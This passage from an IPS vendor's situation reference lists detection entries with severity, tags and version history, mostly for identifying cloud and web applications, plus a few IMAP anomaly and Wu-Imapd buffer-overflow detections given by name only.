Description: An IMAP message part was seen where the antivirus scan result for the whole message is not known. Normally the antivirus scan result for the whole message should be available at this point, but due to low memory some of the cached scan results may have been lost. This message part is let through without an antivirus check if there is no Terminate action for the situation.
Back to top

IMAP_Unknown-Command

About this situation: IMAP client used an unknown command
Context: IMAP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: IMAP client used an unknown command. This may be a nonstandard extension of IMAP, or it may be a signal that the connection does not use IMAP at all.
Back to top

IMAP_WU-IMAPD-Authenticate-BOF

About this situation: Attempt to exploit a buffer overflow in Wu-Imapd
Context: IMAP Client Stream
Severity: 10
Tags: Unix, Any Hardware, University of Washington imapd, CVE1999, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: IMAP-Login-Buffer-Overflow
WU-IMAP-POP-Login-Buffer-Overflow
Description:
Back to top

IMAP_WU-IMAPD-Partial-Body-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow in Wu-Imapd
Context: IMAP Client Stream
Severity: 7
Tags: Unix, Any Hardware, University of Washington imapd, CVE2002, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-137-2032
Last changed: sgpkg-ips-253-3038
Vulnerability: IMAP-Partial-Body-Buffer-Overflow
Description:
Back to top

IMAP_X-Command

About this situation: IMAP client used an X-command (possible local extension)
Context: IMAP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-240-3038
Description: IMAP client used an unknown command starting with an X. These commands are reserved for experimental features and local extensions. The inspection of these commands is not complete, because they have not been standardized yet.
Back to top

IMAutomator

About this situation: Application IMAutomator detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IMAutomator is online link building software comprising a suite of submission tools that puts common link building methods on auto-pilot.
Back to top

Imd-soft

About this situation: Application Imd-soft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iMDsoft is a provider of Clinical Information Systems for critical, perioperative, and acute care environments.
Back to top

IMDb

About this situation: Inernet Movie Database (IMDb) usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-630-5211
Description: IMDb is a source for movie, TV and celebrity content.
Back to top

iMeet

About this situation: iMeet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-601-5211
Description: iMeet is a web conferencing application targeted for business and professional users provided by PGi.
Back to top

iMesh

About this situation: iMesh P2P traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-629-5211
Description: iMesh is a peer-to-peer client for media and file sharing. The application can download music and video content from a P2P network operating on port 80, 443, and 1863.
Back to top

Imgtec

About this situation: Application Imgtec detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Imagination provide products touch the lives of billions of people throughout the world. The company's broad range of silicon IP
Back to top

Imgur

About this situation: Imgur usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-774-5211
Description: Imgur is a popular image sharing web-site.
Back to top

Imhaha

About this situation: IMHaha usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service connects to the instant-messaging systems: MSN, Yahoo!, AIM, and QQ.
Back to top

iMindMap

About this situation: Application iMindMap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iMindMap is the official Mind Mapping software
Back to top

imindq

About this situation: Application imindq detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Desktop iMindQ is a dynamic mind mapping software tool for visual thinking, brainstorming, planning and organizing in real productivity and creativity.
Back to top

ImInTouch

About this situation: ImInTouch usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-717-5211
Last changed: sgpkg-ips-717-5211
Description: I'm InTouch is a remote control software that allows users to securely control remote computer and also transferring files via the Internet.
Back to top

Imo

About this situation: Imo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-630-5211
Description: Imo is a web instant messenger that can perform IM, voice chat, and video conference using multiple instant messaging protocols. The service can be accessed using a web browser at the site: http://www.imo.im.
Back to top

Imomentous

About this situation: Application Imomentous detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Imomentous offer solutions that connect job seekers and employers. The Intelligent Career Site platform delivers the job search, with a career site optimized for mobile and desktop interfaces, ATS integration, tailored content selection like Glassdoor reviews, YouTube videos and LinkedIn connections based on candidate search habits and an integrated real-time recruiting analytics dashboard.
Back to top

Impact-Radius

About this situation: Application Impact-Radius detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Impact Radius delivers a fully-integrated suite of performance marketing technologies that makes the process of executing performance based buys and partnerships and end-to-end streamlined process.
Back to top

Impactia

About this situation: Application Impactia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Impactia has developed Intelligent Email to provide companies with the ability to increase revenues and business potential by using marketing messaging, promotional banners, text ads, links and signatures.
Back to top

IMPak

About this situation: Application IMPak detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IMPak is the enterprise cloud based solution that integrates business processes into one centralized location.
Back to top

Impaqgroup

About this situation: Application Impaqgroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IMPAQ provides IT and consulting services in Europe. IMPAQ deliver end-to-end solutions to the financial services and telecommunication industries. IMPAQ solution portfolio ranges from consulting, system development, system integration, maintenance and support to comprehensive management of IT and business processes.
Back to top

Impel-CRM

About this situation: Impel CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-636-5211
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Imperia-Online

About this situation: Imperia Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Imperva

About this situation: Application Imperva detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Imperva is a provider of cyber security solutions that protect business-critical data and applications. The company's SecureSphere, Incapsula and Skyfence product lines enable organizations to discover assets and risks, protect information wherever it lives - in the cloud and on-premises - and comply with regulations.
Back to top

Imperva_Cloud_WAF_IP

About this situation: Imperva Cloud WAF IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Description: A situation for known Imperva Cloud WAF IP address.
Back to top

Import.io

About this situation: Application Import.io detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Import.io- creates custom APIs or crawl entire websites using desktop app -no coding required.
Back to top

Import2

About this situation: Application Import2 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Import2.com is a data import tool that helps move business or personal data between online services.
Back to top

Improve-Digital

About this situation: Improve Digital usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-769-5211
Description: Improve Digital is an online statistics and advertisement delivery service.
Back to top

improveit!-360

About this situation: Application improveit!-360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: mproveit
Back to top

IMS-Solutions

About this situation: Application IMS-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IMS Solutions designed to simplify the process of organizing, building and maintaining an electronic storefront on the Web.
Back to top

Imvu

About this situation: imvu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: IMVU is a social networking site where people participate in animated 3D scenes. Source: imvu
Back to top

In.mitel

About this situation: Application In.mitel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mitel helps businesses connect, collaborate and take care of their customers. That includes more than 33 million cloud connections daily, making Mitel the world's fastest growing provider of cloud communications.
Back to top

Inap

About this situation: Application Inap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Internap's Agile cloud storage provide a flexible, dependable environment for evolving data management demands.
Back to top

Inbox-Storage

About this situation: Application Inbox-Storage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud Storage provided by Inbox.com
Back to top

Inbox.com

About this situation: Inbox.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: A Web-based Email service that allows users to send and receive emails through the web service with only a web browser.
Back to top

InCloak

About this situation: InCloak usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Description: InCloak provides services that enable anonymous internet usage, such as a web proxy.
Back to top

inContact

About this situation: Application inContact detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: inContact is the cloud contact center software, continuously innovates in the cloud and is the only provider to offer a complete solution that includes the customer interaction cloud, an expert service model and the broadest partner ecosystem.
Back to top

InCorp

About this situation: Application InCorp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InCorp is the most technologically advanced and fastest growing national corporate service company and help national registered agent service or you are just looking to upgrade your existing registered agent service from your current registered agent service provider.
Back to top

Incorrect SysLog configuration (CEF/LEEF)

About this situation: The SysLog configuration is not valid: additional fields file does not exist.
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Description:
Back to top

IndiaMinutes

About this situation: Application IndiaMinutes detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IndiaMinutes offers its services via a toll-free access number based in the USA Routing and switching
Back to top

Indiegogo

About this situation: Application Indiegogo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Indiegogo empowers people to fund what matters to them. It is the platform that allows people raise funds for project - creative, entrepreneurial or cause-related.
Back to top

inDinero

About this situation: Application inDinero detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: inDinero is your entire backoffice. We take care of your accounting, file your corporate tax returns, and manage your payroll. Focus on what matters most, and leave the rest to inDinero.
Back to top

iNet-Internship-Network

About this situation: Application iNet-Internship-Network detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Symplicity is a market company in enterprise technology and information systems management for higher education, government, and businesses.
Back to top

Infinio

About this situation: Application Infinio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Infinio offers downloadable storage performance for virtualized environments.
Back to top

InfinityHR

About this situation: Application InfinityHR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InfinityHR manages online benefit enrollment (Time Off Tracking, Time Attendance, Applicant Tracking, Performance Management, Surveys, and Workflows). automatically and electronically delivers information to each carrier and payroll provider.
Back to top

Inflectra

About this situation: Application Inflectra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inflectra offers software testing tools and project management software for automated project management, quality assurance, and test management.
Back to top

Influitive-AdvocateHub

About this situation: Application Influitive-AdvocateHub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Influitives AdvocateHub application helps B2B marketers increase customer advocacy by creating engaging customer advocacy programs.
Back to top

Infobip-SMS

About this situation: Application Infobip-SMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Infobip SMS is a provider of mobile solutions connecting mobile network operators and enterprises through an in-house developed and operated mobile services cloud.
Back to top

Infoblox-Support

About this situation: Application Infoblox-Support detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Infoblox is developer of network identity appliances that provide a scalable, secure way for enterprises to manage the critical network identity protocols-including DNS, DHCP, RADIUS and LDAP-that link business applications to the network infrastructure.
Back to top

InfoCDB

About this situation: Application InfoCDB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InfoCDB - Customer and Contact Management Software, that enables you to store, catalog, share and rapidly find your information.
Back to top

InfoFlo

About this situation: Application InfoFlo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InfoFlo contact management and CRM infrastructure solves the everyday problem of allowing all office activities to coexist together under one umbrella, making all critical information readily available and a single click away.
Back to top

Infopia

About this situation: Application Infopia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Infopia provides eCommerce software and services with its Infopia Transact solution to help merchants grow their online business. From managing inventory across multiple online channels, to creating enterprise level websites, to integrating business applications such as CRM, Infopia has the right tools to increase online revenues.
Back to top

Infor

About this situation: Application Infor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Infor offers enterprising software solutions for customer relationship management, supply chain management, enterprise asset management and more.
Back to top

Inforama

About this situation: Application Inforama detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inforama is a document production and automation platform, which allows businesses to generate personalized documents, policies, invoices, letters and emails in the cloud or on-premise.
Back to top

Inforgen-E-Commerce-Software

About this situation: Application Inforgen-E-Commerce-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inforgen E-Commerce is a web-based software system, designed to help you drive online sales, cut administration and increase operational efficiency.
Back to top

Informatica-Cloud

About this situation: Application Informatica-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Informatica Cloud delivers enterprise-class software-as-a-service
Back to top

Informatica-Communities

About this situation: Informatica Communities usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Informatica Communities enables organizations to gain a competitive advantage in today's global information economy by empowering them with timely, relevant and trustworthy data for their top business imperatives.
Back to top

Information Technology

About this situation: Sites sponsored by or providing information about computers, software, the Internet and related business firms, including sites supporting the sale of hardware, software, peripherals and services.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or providing information about computers, software, the Internet and related business firms, including sites supporting the sale of hardware, software, peripherals and services.
Back to top

Information-Services-Group

About this situation: Application Information-Services-Group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Information Services Group supports private and public sector organizations to transform and optimize operational environments through research, benchmarking, consulting and managed services, with a focus on information technology, business process transformation, program management services and enterprise resource planning.
Back to top

Informationbuilders

About this situation: Application Informationbuilders detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Information Builders provides software and services that transform data into business value. Information Builders solutions for business intelligence, integration and data integrity are fast to deploy, easy to use, and affordable.
Back to top

Informix

About this situation: Informix usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-759-5211
Description: Informix is a family of Relational Database Management Systems (RDBMS) products provided by IBM.
Back to top

Informore

About this situation: Application Informore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Informore is a Transport Management solution provider specialized in facilitating Purchase-to-Pay processes for larger shippers. Providing multinational shippers with a solution to optimise, manage and control their logistic processes can only be facilitated from a neutral position.
Back to top

Infoseek-Mail

About this situation: Infoseek Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: au one net: One of the first American search engines really adapted for Japanese language. This site also provides web mail service that allows users to send and receive e mails.
Back to top

Infosys

About this situation: Application Infosys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Infosys provides consulting, technology, outsourcing and next-generation services.
Back to top

Infrascale

About this situation: Application Infrascale detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Infrascale is the only complete cloud backup and disaster recovery solution, designed for MSPs
Back to top

Infront-Pro

About this situation: Infront Pro usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows financial firms across Europe to access market data and a trading terminal that includes mobile applications and electronic trading connections.
Back to top

Infusionsoft

About this situation: Application Infusionsoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Infusionsoft is a sales and marketing automation software for businesses combining CRM, email marketing and e-commerce.
Back to top

Ingram-Micro

About this situation: Application Ingram-Micro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ingram Micro reseller offers a broad selection of programs and services - from education, training and business development resources to marketing services and pre- and post-sale technical assistance.
Back to top

InHiro

About this situation: Application InHiro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InHiro is a tool which makes your hiring process easier. Create a visually attractive job ad, share it through social networks and use InHiro as a management tool to funnel candidates through your hiring process.
Back to top

ININ-CTI-Connector

About this situation: Application ININ-CTI-Connector detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Interactive Intelligence is a provider of business communications and call center solutions for customer engagement and unified communications.
Back to top

Initechnologies

About this situation: Application Initechnologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: INI Technologies Private Limited is one of the information technology and internet solutions companies in India. INI Technologies provide quality information technology solutions and services in both the domestic and international markets.
Back to top

Initiafy

About this situation: Application Initiafy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Initiafy is an on-boarding Software for Your Contract Workers and Temporary Employees. Register and train them online before they start work.
Back to top

Inkling

About this situation: Application Inkling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inkling company produces an enterprise publishing platform, called Inkling Habitat, and sells interactive e-books and other digital content to consumers through its website and apps.
Back to top

Inkscape

About this situation: Application Inkscape detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inkscape is vector graphics software which runs on Windows, Mac OS X and Linux.
Back to top

InLattice-Document-Portal

About this situation: Application InLattice-Document-Portal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InLattice is a web-based Document Portal for companies to exchange and manage documents like invoices, purchase orders, sales receipts and payment information with customers and vendors.
Back to top

Innotas

About this situation: Application Innotas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Innotas IT Governance cloud solution is built on a strong foundation of Project Portfolio Management (PPM). Project Portfolio Management will help your IT organization streamline the management of strategic initiatives by allowing you to effectively manage project requests, resources, budgets and projects while delivering visibility to focus on projects with the highest possible return.
Back to top

innovapost

About this situation: Application innovapost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Innovapost offers a variety of Information System
Back to top

Innovation-group

About this situation: Application Innovation-group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Innovation Group plc helps P and C insurers compete in the new normal. Innovation Group's core software and services deliver a best of breed software suite, Innovation Insurer, and claims BPO services, providing a platform for innovation and competitive differentiation for insurers of all sizes.
Back to top

Innovative-Securities

About this situation: Application Innovative-Securities detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Innovative Securities provides investments services for the clients within the frameworks of a portfolio, based on pre-defined investment model.
Back to top

Innovid

About this situation: Application Innovid detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Innovid is the video platform, empowering advertisers to create, deliver and measure the video experiences.
Back to top

Innovise

About this situation: Application Innovise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Innovise is an IT Services Company providing specialist solutions to niche markets through two divisions
Back to top

InoviumPay

About this situation: Application InoviumPay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inovium makes on-demand business process automation products and services based on a unique, robust, and highly flexible financial services platform.
Back to top

Inquisiq

About this situation: Application Inquisiq detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inquisiq R3 is a web-based SCORM compliant Learning Management System
Back to top

Insala

About this situation: Application Insala detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Insala is an online talent development solutions provider of career development, mentoring, coaching, career transition, and alumni software for organizations.
Back to top

Insidesales.com

About this situation: InsideSales.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: InsideSales.com provides the leading sales acceleration platform with phone dialer software. It allsow to contact, qualify and close the sales lead on time.
Back to top

Insideview

About this situation: InsideView usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: InsideView is a software as a service (SaaS) company that gleans insights and relationships from business information, contact data, online news, and social media and customer CRM data.
Back to top

InsightExpress

About this situation: Application InsightExpress detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InsightExpress helps to learn how to capitalize on digital opportunities by segmenting and engaging consumers, planning and optimizing media, and increasing total brand performance.
Back to top

Insightly

About this situation: Application Insightly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Insightly is web based Customer Relationship and Project Management system for small business.
Back to top

InsightSquared

About this situation: Application InsightSquared detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InsightSquared delivers powerfully simple business analytics for companies of any size.
Back to top

InsiteCommerce

About this situation: Application InsiteCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InsiteCommerce is an integrated B2B and B2C eCommerce solution which communicates with your production database through a .NET web service.
Back to top

Inspection_Level_Change

About this situation: inspection level changed
Context: SSM Context
Severity: 1
Tags: SSM Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A policy recheck changed the inspection level. Connection closed.
Back to top

Inspectlet

About this situation: Application Inspectlet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inspectlet records videos of your site visitors as they use your site, allowing you to see everything they do. See every mouse movement, scroll, click, and keypress on your site.
Back to top

Insperity

About this situation: Application Insperity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Insperity's ExpensAble solution makes tracking and reporting expenses easier than ever by automating and streamlining the expense reporting process
Back to top

InspiredElearning

About this situation: Application InspiredElearning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InspiredElearning is a solutions of custom-designed courses, learning management systems and compliance training for your workplace IT needs.
Back to top

Inspirus

About this situation: Application Inspirus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
